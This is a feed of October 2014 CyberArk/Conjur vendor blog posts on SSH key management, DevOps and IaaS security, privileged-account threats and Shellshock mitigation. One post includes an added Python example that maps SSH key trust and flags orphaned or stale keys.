SSH keys are no different from other privileged credentials in that you need to proactively manage them. Find out more about how we can help you secure and manage your SSH keys.

]]>
Watch Our On-Demand DevOps Security Webinar https://www.cyberark.com/blog/watch-our-on-demand-devops-security-webinar/ Wed, 29 Oct 2014 11:47:00 +0000 https://cyberarkvx2.wpengine.com/blog/watch-our-on-demand-devops-security-webinar/  

We were very excited to host yesterday’s DevOps security webinar entitled DevOps, Security, and Modern Infrastructure with CTO Kevin Gilpin and founding team member Kevin O’Brien!

Over the course of the discussion, Kevin and Kevin looked at how security for DevOps is evolving, and how the new tools, principles, and methodologies of the DevOps movement are changing the landscape for information security. In considering these changes, the Conjur team outlined a set of best practices for DevOps security, including:

  • Establish Principles of Least Privilege
  • Enforce Separation of Duties
  • Define Role Based Access Control (RBAC)
  • Prove Compliance and Adherence
  • Manage Authorization (AuthZ) at Scale

We further explored how security for security’s sake inhibits productivity and the benefits that cloud brings, and how to consider and implement risk-appropriate rather than punitive controls.

Watch the DevOps security webinar to learn more about the future of DevOps security, how to architect a secure toolchain and infrastructure, and learn how to manage secrets and permissions at scale!

]]>
Security and DevOps – Why It Matters https://www.cyberark.com/blog/security-and-devops-why-it-matters/ Mon, 27 Oct 2014 16:49:00 +0000 https://cyberarkvx2.wpengine.com/blog/security-and-devops-why-it-matters/  

Security and DevOps – Why Do Anything?

There are two truths in infosec: (a) nobody wants the security folks in their office, and (b) the security team knows it.

For a long time, security software and the budget and staffing it commanded were seen as costs of doing business; nobody really wanted to pay, and it was frequently getting in the way. Over the past couple of years, however, the thinking around infosec has begun to change direction. Done well, security is a business enabler, driving down cost and making it possible to adopt and use technologies faster and more safely than would be possible if done on their own.

Tony Bradley published a great article on the cost of cybercrime last week that underscores why budgeting for security is a vital indicator of innovation, especially for organizations that are embracing DevOps. Three specific points that he made stood out:

  • The cost of cybercrime in 2014 is “nearly 10 percent higher than the average cost in 2013.” In fact, according to the latest version of the Ponemon report, the cost of a breach for a US company is just over $12 million.
  • “The average time it takes to detect a malicious cyber crime attack is 170 days.”
  • Regarding the latest statistics, “many organizations view a report like this as interesting data, but still don’t believe it can happen to them.”


One of the conversations we often hear is that while development and operations tools, and the infrastructure they control, may be evolving, the security approach around them is “good enough”. If Tony’s article could be distilled to a single point, it would be that this claim is indefensible.

We are in the midst of a significant evolution in the tools, technologies, and threat surface. It’s the responsibility of information security professionals to simultaneously adapt to those changes and to do so without getting in their way. The move towards configuration management, the near ubiquity of Agile development practices, and the growth in automation technologies means that mistakes are more costly than ever — a point strongly reinforced by the Ponemon study that Tony cites.

Security and DevOps: Data Worth Protecting

As the article linked to points out, “It’s imperative for organizations to implement the tools, and take the steps necessary to provide better protection, earlier detection, and quicker recovery from cyber crime attacks.”

The protection/detection/response model, which we looked at in detail in our three-part series on the evolving DevOps landscape, is very likely to be the foundation upon which any robust security program will be built moving forwards. Not building on it is a serious risk, especially as development and operations teams take on crown-jewel-level information such as code, product, and customer data.

DevOps is too important to not protect. The relationship between the security and DevOps team should be healthy and close, and focused on how to make sure that the tools being used can be monitored and protected without impeding efforts towards improving the design, development, release, and management of product.


]]>
How Many SSH Keys Have You Left Lying Around? https://www.cyberark.com/blog/many-ssh-keys-left-lying-around/ Thu, 23 Oct 2014 19:22:01 +0000 https://www.cyberark.com/blog//

By John Worrall

How do you prevent unauthorized groups or individuals from gaining access to your valuable information and belongings? A lock and keys – simple, right? Well, what happens when anyone can create a set of keys anytime they want, and keep or share them forever? In the enterprise, organizations are experiencing this very problem, and often don’t even know about it. SSH keys, for example, are created and used daily by IT to get direct, root access to critical systems. With these keys, users have ongoing, uncontrolled privileged access to a target system. And according to IDC, there could be more than one million of them in an average large enterprise!

Earlier this week we launched a major expansion to our Privileged Account Security Solution that covers end-to-end SSH key management, including the discovery of keys. The goal of the product is to address and solve the most common questions we discuss with customers around SSH keys:

  • How many SSH keys do I have? Of those, how many are orphaned?
  • What machines and accounts on the network can be accessed using SSH keys?
  • Which keys are carrying the most risk to my organization?

These are big questions that really only scratch the surface of SSH key vulnerabilities. Normal business operations aren’t the only way SSH keys can be created – there are also vulnerabilities like Shellshock that enable cyber attackers to create what seem to be legitimate keys. And like house keys, SSH keys can be stolen.

This is why we provide a free Discovery and Audit tool that addresses every privileged account, password and SSH key across the entire network. It’s critical to document the age of existing keys, map relationships between users and systems, and determine which keys pose a risk – either because they’re outside of the security policy or because they’re illegitimate keys that should never have been created.

Since we’re potentially talking about more than one million keys on average and this amount of data would be nearly impossible to dig through, we created an SSH Key Trust Map. This visual display shows every SSH key (including the orphaned ones) and what technology trusts each key, enabling access to privileged accounts.
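As an added example of the discovery questions above (example code, not CyberArk’s tooling): a small Python script that parses authorized_keys data from a constructed host inventory, builds a key trust map (which key reaches which account on which host), and flags keys that are orphaned (no known owner), older than a rotation policy allows, or trusted by a root account. The host names, the key registry and the 365-day policy are assumptions.

```python
"""Build an SSH key trust map from authorized_keys data and flag risky keys.

Added example over constructed sample data (not CyberArk's product code).
"""
import base64
import hashlib
import struct
from datetime import date

POLICY_MAX_AGE_DAYS = 365          # assumed rotation policy
TODAY = date(2014, 10, 23)         # fixed so the example is reproducible


def fingerprint(b64_blob: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a base64 public key blob."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys_line(line: str):
    """Return (keytype, b64_blob, comment), or None for blank/comment lines.

    The optional leading options field (e.g. from="...",no-pty) is skipped by
    scanning for the first token that names a key type.
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    tokens = line.split()
    for i, tok in enumerate(tokens):
        if tok.startswith(("ssh-", "ecdsa-", "sk-")) and i + 1 < len(tokens):
            return tok, tokens[i + 1], " ".join(tokens[i + 2:])
    return None


def build_trust_map(inventory):
    """inventory: {host: {account: authorized_keys_text}}
    -> {fingerprint: [(host, account), ...]}  (what each key can reach)."""
    trust = {}
    for host, accounts in inventory.items():
        for account, text in accounts.items():
            for line in text.splitlines():
                parsed = parse_authorized_keys_line(line)
                if parsed is None:
                    continue
                _, blob, _ = parsed
                trust.setdefault(fingerprint(blob), []).append((host, account))
    return trust


def assess(trust, registry, today=TODAY, max_age=POLICY_MAX_AGE_DAYS):
    """Classify trusted keys. registry: {fingerprint: {"owner", "created"}}."""
    findings = {"orphaned": [], "stale": [], "root_access": []}
    for fp, targets in trust.items():
        if any(acct == "root" for _, acct in targets):
            findings["root_access"].append(fp)
        meta = registry.get(fp)
        if meta is None:                      # trusted, but nobody owns it
            findings["orphaned"].append(fp)
        elif (today - meta["created"]).days > max_age:
            findings["stale"].append(fp)
    return findings


def _constructed_ed25519_blob(seed: int) -> str:
    """Syntactically valid ssh-ed25519 public key blob for test data only
    (the 32 key bytes are a hash, not a real key)."""
    pub = hashlib.sha256(b"example-key-%d" % seed).digest()
    blob = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + pub
    return base64.b64encode(blob).decode()


# Constructed sample data: two hosts, three keys, one with no known owner.
KEY_ALICE = _constructed_ed25519_blob(1)
KEY_BOB = _constructed_ed25519_blob(2)
KEY_UNKNOWN = _constructed_ed25519_blob(3)

INVENTORY = {
    "db01.example.internal": {
        "root": (f"ssh-ed25519 {KEY_ALICE} alice@laptop\n"
                 f'from="10.0.0.0/8" ssh-ed25519 {KEY_UNKNOWN} deploy\n'),
        "postgres": f"# managed\nssh-ed25519 {KEY_BOB} bob@laptop\n",
    },
    "web01.example.internal": {
        "deploy": (f"ssh-ed25519 {KEY_ALICE} alice@laptop\n"
                   f"ssh-ed25519 {KEY_UNKNOWN} deploy\n"),
    },
}

# Key registry as an inventory system would hold it (constructed).
REGISTRY = {
    fingerprint(KEY_ALICE): {"owner": "alice", "created": date(2014, 8, 1)},
    fingerprint(KEY_BOB): {"owner": "bob", "created": date(2012, 3, 15)},
}


def run():
    """Return (trust_map, findings) for the sample inventory."""
    trust = build_trust_map(INVENTORY)
    return trust, assess(trust, REGISTRY)


if __name__ == "__main__":
    trust_map, result = run()
    for fp, targets in trust_map.items():
        print(fp, "->", targets)
    print(result)
```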

SSH Keys Relationship Map

So if you’re trying to get a handle on your company’s exposure to unsecured SSH keys, we can help. Our solution discovers, secures and manages SSH keys as well as other privileged credentials in a single, integrated platform to identify, manage and protect against advanced external attackers and malicious insiders.

To learn more, read about CyberArk SSH Key Manager.

]]>
On the Future of IT, Part III: Securing DevOps Infrastructure https://www.cyberark.com/blog/on-the-future-of-it-part-iii-securing-devops-infrastructure/ Wed, 22 Oct 2014 15:14:00 +0000 https://cyberarkvx2.wpengine.com/blog/on-the-future-of-it-part-iii-securing-devops-infrastructure/  

Securing Modern Infrastructure

In the first two parts of this series, we’ve looked at the ideas that significant organizational change improves companies, and that the growing DevOps movement is an example of change in how infrastructure, development, and operations are blending together.

Today, in the third and final part of this series, I want to explore the security implications of this change, and offer some best practices and ideas for addressing them.

Over the course of my career in security, I’ve learned a few ground rules for designing an effective security program:

  • Strategically, security (and by extension, incident response) has three components: prevention, detection, and response. Tactically, each of these involves some mix of people, process, and technology.
  • For prevention and detection, minimize the “people” component and maximize “process and technology”. Standardization and specialization are force multipliers. (For response, technology isn’t yet — and perhaps will never be — capable of replacing people.)
  • As a corollary, the more you invest on defining, supporting, standardizing, and automating prevention and detection, the less difficult response will be.
  • In a crisis, when time is of the essence, difficulty equates to cost. (Think of the iron triangle: if you don’t have time, and you need quality, you’re going to pay for it.)
  • Resist the temptation to “do it yourself” when it comes to process and technology. In almost every circumstance, you’re reducing standardization, adding complexity, and reinventing the wheel. Any money saved by doing it in-house will be significantly offset when a crisis emerges.

Making Friends, Influencing DevOps

With these ideas in mind, what will a good security program for a DevOps culture look like?

Fundamentally, it will be aligned with the same business-enabling values that DevOps itself brings: automation, continuous integration (or in this case, continuous monitoring), and avoidance of one-off solutions in favor of systematic good decision making and security.


What this will look like from a market perspective, from an infrastructure perspective, is a replacement for outdated methodologies of implementing identity, permissions, and secrets/key storage. Why these? Because they represent the areas where (1) infrastructure access is both defined (permissions) and controlled (secrets/keys), (2) they are the functional areas where moving to a more robust design (RBAC vs. hierarchical groups, for example) will improve the prevention and detection phases of the security model, and (3) these updates are ripe for standardization from vendor-developed software.

Putting it in Practice

Obviously, we have a bias for implementing this “automation of security for DevOps” idea, but putting that aside for a moment, let’s consider what it means to adopt any kind of security model here.

Security, traditionally, has been looked at through a lens of blocking business initiatives. At best, it’s a hot potato; nobody wants to be the one to be pointed at if something goes awry and data is lost, and it’s typically seen as a distraction by non-security professionals.

The difference in implementing the model from a DevOps perspective, however, is that we’re looking at embedding permissions and key management into the infrastructure from the ground up. What that means is that prevention and detection are intrinsic to, say, the rollout of Puppet, or VMWare, or whatever other tools might come into your infrastructure in the future. Instead of hand-cranking secrets storage, you’ll have a purpose-built and well defended secrets repository, along with a role-based access control model that determines who, what, where, when, and how those secrets should be accessed.

The value to a DevOps team is that by handling security in this way, they can focus on the more interesting problems (“how can we automate our build processes more effectively? What can we do to reduce our work-in-progress queue and release more quickly?”, and so on) than “how do we keep our audit guys from bugging us?”

In the same way that security melded with IT when users changed the model for application and device selection, we believe that it needs to do the same for DevOps, both because it’s good practice (per the “ground rules” above) as well as an essential part of building and securing DevOps infrastructure moving forwards.


]]>
SSH Keys: The Powerful, Unprotected Privileged Credentials https://www.cyberark.com/blog/ssh-keys-powerful-unprotected-privileged-credentials/ Tue, 21 Oct 2014 08:00:29 +0000 https://www.cyberark.com/blog//

When thinking about privileged accounts – and the credentials used to access them – passwords typically come to mind. Yet passwords are only part of the equation. The Secure Shell (SSH) key, a low-profile, “Swiss Army Knife” of IT teams, is one of the most heavily used access control and encryption protocols in the enterprise, providing direct, root access to critical systems. Yet SSH keys often fly under the radar of security teams. As a result, these powerful credentials are left unsecured and unmanaged, leaving gaping holes in security and providing attackers with easy, direct access to the heart of the enterprise.

Research by Ponemon Institute shows that three out of four enterprises have no security controls in place for SSH keys and that 51 percent of enterprises have already experienced an SSH key-related compromise. Sobering statistics, though not surprising, as SSH keys are often created without any oversight or management, and an average enterprise can have one million SSH keys in their environment. It’s time to start treating SSH keys like the privileged credentials they truly are.

Today, CyberArk unveiled comprehensive SSH key management as part of our Privileged Account Security Solution. Companies can now secure and manage SSH keys as well as other privileged credentials in a single, integrated platform to identify, manage and protect against advanced external attackers and malicious insiders.

Learn more about how CyberArk can help protect your organization’s SSH keys at www.CyberArk.com/SSH.

]]>
On the Future of IT, Part II: Saying Yes to DevOps https://www.cyberark.com/blog/on-the-future-of-it-part-ii-saying-yes-to-devops/ Tue, 21 Oct 2014 11:29:00 +0000 https://cyberarkvx2.wpengine.com/blog/on-the-future-of-it-part-ii-saying-yes-to-devops/  

How to Say Yes to DevOps?

Yesterday, I wrote about the idea that uncomfortable change often results in improved outcomes, and questioned whether we are looking at a moment of such change in the IT and security space as a result of the DevOps movement.

Today, I want to spend some time reflecting on this, and do so by considering a parallel trend I was witness to during my time at CloudLock (a great team, by the way, and leaders in helping companies secure end-user cloud applications like Google Apps and Salesforce). In a nutshell, the argument I am making is that DevOps is to modern IT as cloud was in the last technology cycle.

The Growth of Cloud – An Object Lesson

Seven years ago, Google launched Google Apps for businesses; it was the first time they made publicly available a set of tools (mail, calendaring, IM, and an early version of their office suite) that competed directly with the legacy tools that office workers had become used to — Outlook and Lotus, Office and its competitors, and so on. Over the course of the next few years, adoption of the tool grew, in part because it offered users an experience that was more collaborative and productive than was possible with the on-disk equivalents from Microsoft, IBM, Corel, and other older vendors.

There was a similar trend in sales automation and CRM tooling running in parallel, vis-à-vis Salesforce. While its roots are in the late 1990s, Salesforce released their developer platform in 2007, and since then their revenues grew to over $4b; largely purchased by sales management rather than IT, the platform has found its way into many companies’ infrastructures without having been procured through traditional channels.


What made both of these possible was the utility and efficiency that the products offered, coupled with direct adoption by their target communities. When they were engaged, IT and InfoSec reactions ranged from confusion to hostility, especially in the early days of these products’ growth. What has changed over the intervening 7 years is both the acceptance of the technologies (and the emergence of competitors, naturally), as well as the establishment of a market that provides those same IT and security professionals with the monitoring and security tools needed to meet both regulatory and organizational requirements around their use.

Nothing New Under The Sun

Flash forward to today. The DevOps movement, fueled by efforts of development and operations staff to make their workflows faster, their jobs easier, and their efficiency greater, is incredibly similar to what we saw with end-user adoption of cloud in the last decade. Tools like Puppet, Chef, and SaltStack are driving new infrastructure design and deployment; operations are segmenting out their environments via Docker and VMWare; development teams are building and testing software with Continuous Integration workflows via Jenkins, replacing SVN with GitHub, and otherwise choosing entire toolchains based on their needs rather than IT’s vendor management process.

What has not yet happened is the clear definition of the threat surface surrounding these decisions, or the subsequent creation of responses to ensure that organizations undergoing DevOps transformations are secure and safe. While understandable, closing this gap is critically important if DevOps is truly going to redefine the landscape for companies moving forwards.

Tomorrow, in the third and final part of this series, we’ll look at what the threat surface itself is and how to address it. I would love to hear from you as well – you can drop me a line directly at kobrien@conjur.net.


]]>
On the Future of IT, Part I: Beowulf, IT, and Broken Pottery https://www.cyberark.com/blog/on-the-future-of-it-part-i-beowulf-it-and-broken-pottery/ Mon, 20 Oct 2014 14:43:00 +0000 https://cyberarkvx2.wpengine.com/blog/on-the-future-of-it-part-i-beowulf-it-and-broken-pottery/  

On the Future of IT

On my drive into the office, I’ve taken to listening to Audible.com versions of university lectures, at least temporarily replacing my old standby of NPR. I’ve not lost any of my appreciation for the local affiliate (WBUR), but I find that spending a couple of hours each day on a consistent topic passes the time more enjoyably.

This month, my topic of choice has been a survey of medieval European history, written and delivered by Professor Dorsey Armstrong, who teaches at Purdue. Partially inspired by my fascination with (read: addiction to) Crusader Kings II, I find Armstrong’s depth of knowledge and delivery both incredible; she’s as apt to tell a bawdy joke from early Anglo-Saxon literature as she is to launch into a spirited bit of Old English while reading from Chaucer.


On this morning’s drive, I was listening to her describe the Beowulf tale, and discuss how what was originally a story born of oral tradition was likely influenced by a scribe with religious leanings. Without diving too deeply into the details, one of the themes that Armstrong presents is that the Medieval period in general is defined following the collapse of the Roman empire in or around 476 AD as being about the rebuilding of European civilization as an amalgamation of Germanic, Christian, and Roman ideas and values, often despite profound tensions between them.

Western civilization is, I think most will agree, pretty successful.

What this led me to think about was how any endeavor that is built from stress ends up being stronger than those that are not. It’s as true for the societies of medieval Europe as it is for muscle growth in the human body: where there is hardship, the end result is improved. Sam Sheridan, Harvard University alumnus, author, and mixed martial artist, often quotes Virgil when talking about this idea: Mundis Ex Igne Factus Est (“the world is born in fire”). The Japanese call it kintsugi, the art of repairing and thus improving things with gold.

Are we witness to a moment of similar rebuilding inside of information technology? What mix of cultures will define how the security, development, and operations will be construed in the coming years? Over the coming few days, we’ll take a look at these ideas in more detail, ranging from the legacy of BYOD and user-cloud selection to the nascent DevOps movement and its implications on how products are both built and secured. Stay tuned!

We’ll also be speaking on Wednesday afternoon at the MassTLC Information Security conference in Boston, doing a bit of crystal ball gazing and looking for answers to these questions (and more). If you’re in the area, we hope you’ll join us — the last chance to register is today!


]]>
Privileged Account Security Key Ingredient to ‘Evil Layer Cake’ https://www.cyberark.com/blog/privileged-account-security-key-ingredient-evil-layer-cake/ Thu, 16 Oct 2014 12:38:30 +0000 https://www.cyberark.com/blog//

By John Worrall

In a recent 60 minutes interview, FBI Director James Comey discussed the current state of threats to U.S. security.  Around eight minutes and fifty seconds into the interview, Comey starts to focus on the cyber-security threat and the need to transform the FBI to fight crime and espionage online with this great quote:

“I think of it as kind of an evil layer cake. At the top you have nation state actors, who are trying to break into our systems. Terrorists, organized cyber syndicates, very sophisticated, harvesting people’s personal computers, down to hacktivists, down to criminals.”

The cyber-threat we’re facing is rightfully getting attention at the highest levels. The NY Times reported recently that President Obama has been receiving periodic briefings on major cyber attacks along with his security briefings on physical terrorist attacks.

If security defenses have failed to keep pace with the ‘evil layer cake’ so thoroughly that the President is getting briefed specifically on incidents, what can we do? The most important step is to understand exactly how attacks are being carried out and what makes them so successful at bypassing perimeter security defenses.

The key ingredient in nearly every instance has been privileged credentials. They were critical in the recent banking attacks, they are the fulcrum on which the recent PoS/retail breaches swing, they are the reason intelligence organizations are targeting IT workers, and they were at the heart of the most devastating breaches to the U.S. intelligence community, including Ed Snowden and Chelsea Manning.

Why is this? Since the beginning of time, the best way to steal anything has been to look like you belong and act like an insider. In the digital world, the best way to transform into an insider is by stealing or exploiting privileged accounts. These are the most powerful credentials in any organization, designed to manage network systems, run services, or allow applications to communicate with one another. They are the keys to the IT kingdom.

We have been talking about how critical a security problem privileged accounts are for some time, yet organizations around the world are still leaving these incredibly powerful credentials unprotected and available to hackers.  Cyber security is predicated on our ability to starve attackers of information. Until we understand this and lock down the pathways of least resistance, security will remain elusive.

]]>
Join us at the MassTLC Security Conference! https://www.cyberark.com/blog/join-us-at-the-masstlc-security-conference/ Wed, 15 Oct 2014 10:24:00 +0000 https://cyberarkvx2.wpengine.com/blog/join-us-at-the-masstlc-security-conference/  

Are you coming to the MassTLC Security Conference on October 22, 2014?

If so, we hope that you’ll join us at 3:20pm in the Morris Auditorium for our panel discussion on innovation in the information security space:

When
October 22, 2014
3:20pm-4:00pm

Where
Federal Reserve Bank of Boston
600 Atlantic Ave #100
Boston, Massachusetts 02210
United States
Morris Auditorium

Topic
Innovating in Information Security
This session will focus on how entrepreneurs, companies and investors all have an opportunity to help defend against information security attack. Discussion topics will range from what security challenges are gathering momentum, market insight, hiring employees and raising capital.


In this “fireside chat” style panel discussion, our own Kevin O’Brien will be joined by Greg Dracon from .406 Ventures and Jon Stavis of Fidelity Investments to discuss how the landscape for risk and information security is changing, looking at topics ranging from DevOps to data breaches. In addition, there will be a lengthy Q&A period, giving the audience plenty of time to ask their own questions and dig into how and where the security market is going.

Of course, if you have any questions, comments, or want to catch up with Kevin before or after the panel, we’d be happy to help. Drop us a line directly at info@conjur.net.


]]>
The ‘Insider Threat’ is Privileged Access, not a Person https://www.cyberark.com/blog/insider-threat-privileged-access-person/ Tue, 14 Oct 2014 15:13:21 +0000 https://www.cyberark.com/blog//

By John Worrall

The standard reply to “what is an insider threat” generally circles around the concept of a bad apple within the company, and this is shortsighted. Principal investigators in Oxford University’s Corporate Insider Threat Detection research program have it right in their recent Harvard Business Review article, “The Danger from Within,” defining it as:

The Insider threat comes from people who exploit legitimate access to an organization’s cyber assets for unauthorized and malicious purposes or who unwittingly create vulnerabilities.

However, researchers David M. Upton and Sadie Creese miss the mark on one critical aspect of the problem: privileged access is not restricted to employees, contractors or other individuals. They lay out the problem like this:

You must diligently manage the privileges of all employees—including those with the highest levels of access to company systems, who are often the instigators of insider attacks. Prune your list of most privileged users regularly—and then watch the ones who remain to verify that they deserve your trust. Look for insider-threat-detection systems that can predict possibly preventable events as well as find events that have already occurred. Big data can be helpful in linking clues and providing warnings.

The problem is not where an attack starts or if an individual works for the company – it’s about an attack that’s already behind the traditional security perimeter. It would have been more accurate to stop at, you must diligently manage privileges. Simply put, privileged accounts turn an external attacker into an insider, moving freely across the network without detection. These privileged credentials are the true threat lurking inside your organization. If left unprotected, a malicious insider will use them to hurt your business, or an outside attacker will use them to act like an insider.

These accounts represent a huge attack surface, and are used by IT staff and exist in every piece of technology connected to your network – hardcoded passwords in applications, across devices, etc. They are the real insider threat to an organization. These accounts can provide absolute control over a company’s infrastructure, which is why security researchers like CyberSheath have highlighted that they have been at the epicenter of 100 percent of all advanced attacks.

The most common cybersecurity safeguards – vulnerability management, strong boundary protection, password policy, awareness programs – just don’t work when it comes to these types of situations, according to Upton and Creese.

If these common practices are so ineffective, then what can we do?

  • Integrate a company-wide privileged account security solution. Many companies chose only ‘high-risk’ network environments to protect, however, recent retail breaches show that every piece of the organization needs to be protected – from third-party vendor access to HVAC systems to PoS terminals.
  • Deploy analytics-based security practices to monitor privileged user-behavior. By monitoring the behavior of even those with the highest level of access to company systems, you will be alerted to anomalous behavior more quickly so you can respond as necessary.
  • Reassess your list of privileged users regularly. Many companies are unaware of the number of privileged accounts that are left forgotten and unused – many times left behind after an acquisition or merger. Make sure to locate and close any of these discarded accounts that can be easily exploited.
  • Use one-time passwords that expire after a single use. Using one-time passwords takes the onus off of your IT staff to choose passwords complex enough or change passwords often enough. Since we’re far from a world without passwords, one-time password use is one of the best solutions for secure authentication.

The sooner organizations understand that their privileged accounts are the true insider threat, the quicker effective security strategies can be deployed. If you’re not identifying, controlling and monitoring all privileged account activity, then you’re leaving the door wide open for a breach.

]]>
Getting IaaS Security Right https://www.cyberark.com/blog/getting-iaas-security-right/ Tue, 14 Oct 2014 11:26:00 +0000 https://cyberarkvx2.wpengine.com/blog/getting-iaas-security-right/  

In June of this year, the Ponemon Institute published a report on how the use of cloud technology changes the breadth and cost of data breaches. A few of the more interesting statistics that jumped out at us:

  • 66% of respondents say their organization’s use of cloud resources diminishes its ability to protect confidential or sensitive information.
  • 62% of respondents do not agree or are unsure that cloud services are thoroughly vetted before deployment.
  • 69% of respondents do not agree that their organization’s cloud services use enabling security technologies to protect and secure sensitive and confidential information.

In other words, cloud infrastructure, while continuing to gain traction in the market, is also viewed as inherently more risky than on-premise technology.

Interestingly, however, the market for these projects is continuing to grow. Gartner predicts that by 2016, IaaS and PaaS spend will surpass SaaS. Businesses aren’t thinking about “going cloud” any more – they’re there, and they are moving increasingly important parts of their businesses into the infrastructure offered from Amazon, Microsoft, Rackspace, and others.

Understanding the Threat Surface

If you step back a few years, you can see that in the SaaS market, security was initially perceived of as a blocker to cloud adoption. Moving sensitive data to Salesforce, Google Apps, Workday, and the like was prohibitively difficult; while on-premise systems had strong firewalls, DLP, and other technical answers to threat, the cloud alternatives did not.


Over time, those challenges were considered in cloud-specific ways: instead of preventing users from sharing data, for example, technologies emerged that were able to find and remediate exposure of PII, PCI, PHI, and other sensitive information without driving users into shadow IT systems.

There is a strong analogue in this evolution of thought to what we expect to see in the IaaS trend that Gartner identifies. Consider that in the Ponemon report, 69% of respondents said that an increase in infrastructure-as-a-service would decrease their organization’s likelihood of a data breach. Why is this?

The IaaS Risk and Response Model

We believe that it is a function of not understanding the threat surface for IaaS. In the same way that firewalls did not provide security for organizational data stored in Salesforce, the SaaS-level solutions (encryption, tokenization, and compliance governance) do not map well to IaaS. In fact, the market has almost no answer for these risks yet.

This is where Conjur sits. We believe that the threats to IaaS have to do with privileges and secrets management. When properly managed, an organization can move infrastructure into automated cloud environments without worrying about user or service-level breaches, insider or outsider abuse, or escalation of privileges based on poorly secured SSH keys, SSL certs, or other secrets.

The conversation is just beginning, but as the Ponemon statistics reveal, it’s a critical one to have. We will be diving into it in more depth in our upcoming webinar on October 28, 2014 — you can register by clicking the button below, and join us to learn more about how these risks play out in practice, and how to address them within your organization.

Hope to see you there!

]]>
Passwords are not Treated as Critical to Cyber Security https://www.cyberark.com/blog/passwords-treated-critical-cyber-security/ Thu, 09 Oct 2014 14:47:17 +0000 https://www.cyberark.com/blog//

By John Worrall

Over the past year, the password has taken center stage as a critical cyber security problem, illustrated by the Gmail hack, cracking iCloud security and countless others. In response, numerous opinions have been expressed over ways to stop this from happening, including our own.

Yet, organizations continue to allow employees to select their own passwords for corporate assets.  Does this mean credentials are not a critical piece of the cyber security strategy? Employees are not expected to manage other key security processes, such as installing antivirus, monitoring updates, reviewing vulnerability reports, etc., yet passwords are ok for employees to own?

Some passwords are far more powerful than others – such as those for privileged accounts – and these absolutely need to be considered a critical cyber security matter rather than simply another password for IT staffers to manage.

The best policy for organizations is to simply not allow employees to set their privileged credentials to begin with. Using a dedicated enterprise password management solution can prevent users from ever knowing the privileged credentials or even having to type anything in, while still giving them the immediate access business requires. Why is it important to eliminate typing in a password?

At this year’s Black Hat Conference, researchers from the University of Massachusetts Lowell demonstrated a new twist to an old conman skill – demonstrating how to intercept passwords visually, without hacking anything. This is a must read!

Using an ATM interaction, the researchers used multiple cameras independently, including Google Glass, web cameras, smartphone cameras and even smartwatches to record the user’s hand and finger motions as they entered their PIN. The cameras couldn’t see the keys, just the hand movements. This movement was then mapped over an image of a soft keyboard and voila! The PIN was stolen without malware, a skimmer, exploiting a zero-day or any other breach.

Cameras are as ubiquitous today as laptops and both are commonly used in the same location. Think about the last time you logged into your work laptop at an airport. How many people did you notice taking photos or videos? How about the coffee shop you last logged in at? In the world of advanced threats where employees are targeted as an easy way to access a network, making sure passwords are treated as a critical security matter is a smart move.

For more information on how your company can secure its privileged passwords and credentials and prevent unwanted access into critical assets, check out our Enterprise Password Vault and Privileged Session Manager products.

Conjur DevOps Security Webinar – October 2014 https://www.cyberark.com/blog/conjur-devops-security-webinar-october-2014/ Thu, 09 Oct 2014 10:35:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-devops-security-webinar-october-2014/  

If you’ve been watching the infosec news, you know that the past few weeks have been remarkable. The largest data breach in US history was revealed (at JPMorgan), ShellShock has reverberated through the industry, and the technologies and security software deployed at many large organizations are failing to keep up.

There is no silver bullet. Anyone who says otherwise is simply trying to sell you something.

But, there are new threat surfaces, new infrastructure components that need to be considered in terms of organization security stance, and new best practices for addressing them. This month, we will be holding the first in a series of webinars that address these topics, led by DevOps expert Kevin Gilpin and security industry veteran Kevin O’Brien (formerly of @stake and CloudLock). Topics that will be addressed include:

  • How the DevOps movement represents an opportunity to increase security without impeding innovation
  • The implications of ShellShock (and Heartbleed, and myriad other breaches) for good secrets management, from SSH keys to SSL certs
  • A real-world example of how to architect a secure DevOps system, encompassing both permissions and secrets management

Space is limited, so register early if you are interested in learning more about DevOps, cloud infrastructure, and how information security relates to both!

Getting past the Shellshocker Cyber Threat with Privileged Identity Management https://www.cyberark.com/blog/getting-past-shellshocker-cyber-threat-privileged-identity-management/ Tue, 07 Oct 2014 17:35:31 +0000 https://www.cyberark.com/blog//

By Yair Sade

At this point, you’ve probably heard of the newest cyber threat to hit the Internet – the Shellshock bug. Said to be a more serious vulnerability than Heartbleed, Shellshock has been lurking in the massively popular software package Bash, a command line interpreter, or shell, that provides a powerful, flexible way to run commands on a computer. A highly stealthy vulnerability, Shellshock has gone undetected in Bash for more than two decades, counting as yet another advanced persistent threat factor!

How serious is this? Bash is a standard, free tool on all UNIX-based operating systems and Apple’s OS X. One of the largest industries to rely on UNIX-based systems is the energy sector, whose SCADA and industrial control systems are largely built on this technology. Additionally, it is widely used on simple Internet-connected devices, meaning that not only can servers be compromised but also home routers, IP cameras … think in terms of the Internet of Things.

What does Shellshock do? In a nutshell, it allows attackers to execute code remotely, leaving organizations susceptible to unauthorized processes or commands on target machines. This type of ‘open door’ is the ideal entry point for a classic advanced persistent threat.

What can you do to defend against such a zero-day? A zero-day is limited to one piece of technology, or any machine that runs the affected technology. From there, the attacker needs to find other ways to jump beyond the reach of the zero-day.  Focus on privileged account security, so any attack is limited in scope and damage by cutting off an attacker’s ability to move laterally from an affected machine to others in the network.

From a privileged account security perspective, here’s what we recommend:

1. Harden UNIX servers: Since Shellshock targets UNIX machines, organizations should harden their servers. This can be done by implementing a ‘least privilege’ strategy and preventing unlimited root shell accesses. CyberArk On-Demand Privileges Manager enables companies to remove unnecessary root privileges, while tightly controlling or restricting shell capabilities when needed. This means that only authorized commands can be run, rather than those injected by an attack, such as through Shellshock.

2. Monitor privileged account behavior: Exploited zero-day vulnerabilities most often lead to privileged credential theft as a way to move beyond the vulnerable machine. To identify this lateral movement, organizations should monitor account behavior for irregular behavior of privileged accounts. CyberArk Privileged Threat Analytics provides targeted, immediately actionable threat alerts by identifying previously undetectable malicious privileged user and account activity.

If you are concerned about your UNIX environment and the impact Shellshock might have on your organization, we can help you.

Designing Least Privilege Into Modern Infrastructure https://www.cyberark.com/blog/designing-least-privilege-into-modern-infrastructure/ Tue, 07 Oct 2014 13:22:00 +0000 https://cyberarkvx2.wpengine.com/blog/designing-least-privilege-into-modern-infrastructure/  

The last week has been a doozy for security breach followers.

